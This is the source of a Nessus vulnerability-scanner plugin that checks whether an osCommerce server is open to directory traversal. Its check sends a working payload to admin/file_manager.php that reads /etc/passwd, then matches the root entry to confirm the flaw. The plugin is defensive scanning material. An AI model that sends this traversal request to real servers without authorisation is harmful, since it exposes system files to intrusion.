home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / osCommerce_dirtraversal.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  59 lines

  1. #
  2. # This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
  3. # Ref:  Rene <l0om@excluded.org> and Megasky <magasky@hotmail.com>
  4. #
  5. # This script is released under the GNU GPL v2
  6. #
  7. if (description)
  8. {
  9.  script_id(17595);
  10.  script_bugtraq_id(10364);
  11.  script_version ("$Revision: 1.1 $");
  12.  
  13.  script_name(english:"osCommerce directory traversal");
  14.  desc["english"] = "
  15. The remote host is running osCommerce, a widely installed open source 
  16. shopping e-commerce solution.
  17.  
  18. The remote version of this software is vulnerable to a directory traversal 
  19. flaw which may be exploited by an attacker to read arbitrary files
  20. on the remote server with the privileges of the web server.
  21.  
  22. Solution : Upgrade to a newer version of this software
  23. Risk factor : Medium";
  24.  
  25.  script_description(english:desc["english"]);
  26.  script_summary(english:"Determine if osCommerce is vulnerable to dir traversal");
  27.  script_category(ACT_GATHER_INFO);
  28.  script_family(english:"CGI abuses : XSS");
  29.  script_copyright(english:"This script is Copyright (C) 2005 David Maciejak");
  30.  script_dependencie("find_service.nes", "http_version.nasl", "cross_site_scripting.nasl");
  31.  script_require_ports("Services/www", 80);
  32.  exit(0);
  33. }
  34.  
  35. include("http_func.inc");
  36. include("http_keepalive.inc");
  37.  
  38. port = get_http_port(default:80);
  39.  
  40. if (!get_port_state(port))exit(0);
  41. if (get_kb_item(string("www/", port, "/generic_xss"))) exit(0);
  42. if (!can_host_php(port:port)) exit(0);
  43.  
  44. dir = make_list(cgi_dirs());
  45.  
  46. foreach d (dir)
  47. {
  48.  url = string(d, "/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd");
  49.  req = http_get(item:url, port:port);
  50.  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
  51.  if( buf == NULL ) exit(0);
  52.  
  53.  if (egrep(pattern:"root:0:[01]:.*", string:buf))
  54.  {
  55.    security_warning(port:port);
  56.    exit(0);
  57.  }
  58. }
  59.